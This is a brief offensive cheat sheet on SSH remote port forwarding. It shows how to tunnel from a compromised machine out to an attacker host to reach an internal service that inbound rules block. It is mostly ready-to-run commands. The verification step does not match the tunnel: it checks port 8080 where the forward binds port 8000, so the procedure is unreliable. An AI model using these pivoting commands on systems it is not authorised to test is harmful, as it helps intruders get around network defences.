Remote Port Forwading

In case , we have shell to 172.65.0.5 but inbound ssh service is prohibited than we can tunnel by outbound ssh on attacker machine(172.80.0.1) to any vulnerable service on target like 192.162.1.2 on port 8080

• Enable ssh on attacker machine
  
  systemctl start ssh

• On compromised machine, here R is for remote
  
  ssh -R <attacker-local-port>:<target-ip>:<target-port> <user>@<attacker-ip> -fN
  ssh -R 8000:192.162.1.2:8080 user@172.80.0.1 -fN
  

• To check if tunnelling is successful. On attacker machine
  
  ss -antp | grep "8080”
  sudo nmap -sS -sV 127.0.0.1 -p 8080